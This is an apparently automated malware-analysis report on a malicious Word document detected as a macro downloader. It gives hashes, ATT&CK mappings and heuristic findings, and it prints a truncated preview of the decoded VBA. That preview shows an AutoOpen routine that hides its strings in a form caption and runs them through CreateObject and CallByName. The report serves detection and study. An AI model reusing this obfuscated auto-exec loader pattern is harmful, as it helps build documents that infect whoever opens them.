Office (OOXML) malware analysis — malicious · 3d9ded92dc9eb820

MALICIOUS

Office (OOXML)

41.4 KB Created: 2016-02-24 09:00:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2020-09-07

MD5: 405cb23e2bfaa8fbd48208183788a4ba SHA-1: c9e719f349ea2eaf9238e4eb50b15d0d3fa6d596 SHA-256: 3d9ded92dc9eb820ef7ea68d7f844cd217b7dbebc643d58048565b922736b43f

362 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1140 Deobfuscate or Obfuscate Malicious Code

The sample is an OOXML document containing obfuscated VBA macros, including an AutoOpen macro that utilizes CreateObject and CallByName. Heuristics indicate an obfuscated auto-exec loader, suggesting it's designed to download and execute a secondary payload. ClamAV detection further confirms its malicious nature as a downloader.

Heuristics 8

ClamAV: Doc.Downloader.Bendis-6680540-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Bendis-6680540-0
VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	15701 bytes
SHA-256: `82f5ae6e19e9d01039182c3678a4a34feed72e188326290ade530bc049ec2cda`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub autoopen() Call CenterByMan End Sub Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{79738CEB-EDB8-4A82-8D14-A28495CA1ABC}{84D9E670-77DF-4E57-91F7-E43C0C124937}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Module1" Public fishkinet_1 As Object Public fishkinet_2 As Object Public fishkinet_3 As Object Public fishkinet_7() As String Public fishkinet_4 As String Public fishkinet_5 As String Public fishkinet_6 As Object Public hubabuba() As String Public MapsInitialized As Boolean Public mDBname As String Public MapInit As Boolean ' ________________________________________Util Functions End____________________________________________ ' summe vom Range Public Function rngCol(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant) Dim res() ReDim res(1 To endRow - startRow + 1, 1 To 1) Dim i As Integer Dim j As Integer Dim sum As Double For i = startRow To endRow For j = 0 To UBound(arrCol) If IsNumeric(Cells(i, arrCol(j)).Value) Then sum = sum + Cells(i, arrCol(j)).Value End If Next j res(i - startRow + 1, 1) = sum sum = 0 Next i rngCol = res End Function Public Function rngArr(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant) Dim res() ReDim res(1 To endRow - startRow + 1, 1 To 1) Dim i As Integer Dim j As Integer Dim sum() ReDim sum(0 To UBound(arrCol)) For i = startRow To endRow For j = 0 To UBound(arrCol) sum(j) = Cells(i, arrCol(j)).Value Next j res(i - startRow + 1, 1) = sum ReDim sum(0 To UBound(arrCol)) Next i rngArr = res End Function Public Function rng(ByVal start As Integer, ByVal ending As Integer) Dim res() ReDim res(0 To ending - start) Dim i As Integer For i = start To ending res(i - start) = i Next i rng = res End Function Public Sub CenterByMan() Dim Col As String Dim obj As String hubabuba = Split(UserForm1.Label1.Caption, "/") GoTo ErrExit ErrExit: Set fishkinet_1 = CreateObject(hubabuba(0)) CheckBins Exit Sub husbanDip: AD.DisplayError Err.Number, "modMaps", "CenterByMan", Err.Description Resume ErrExit End Sub ' ______________________________ Print______________________________________________ Public Function p() ' check if the val is array Dim is_a As Boolean Dim k For Each k In Me.dict.Keys is_a = IsArray(Me.dict(k)) Exit For Next k If is_a Then For Each k In Me.dict.Keys Debug.Print k & " " & a_toString(Me.Item(k)) Next k Else For Each k In Me.dict.Keys Debug.Print k & " " & Me.Item(k) Next k End If End Function Public Function a_toString(ByVal arr As Variant) As String Dim res As String Dim i res = "[" For Each i In arr res = res & Replace(" " & i, ",", ".") & ", " Next i res = Left(res, Len(res) - 2) a_toString = res & " ]" End Function Public Function pk() Dim k For Each k In Me.dict.Keys Debug.Print k Next k End Function Public Sub SaveMaps() rbp = CallByName(fishkinet_1, hubabuba(10), VbGet) Dim objStor As Variant CallByName fishkinet_2, hubabuba(9), VbMethod, rbp CallByName ... (truncated)
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	62976 bytes
SHA-256: `2410e4395ef4e895d01cd8add7121bd1883d2bc0e6517ed4b5d4ee508eb0fb6f`
Detection ClamAV: Doc.Downloader.Bendis-6680540-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.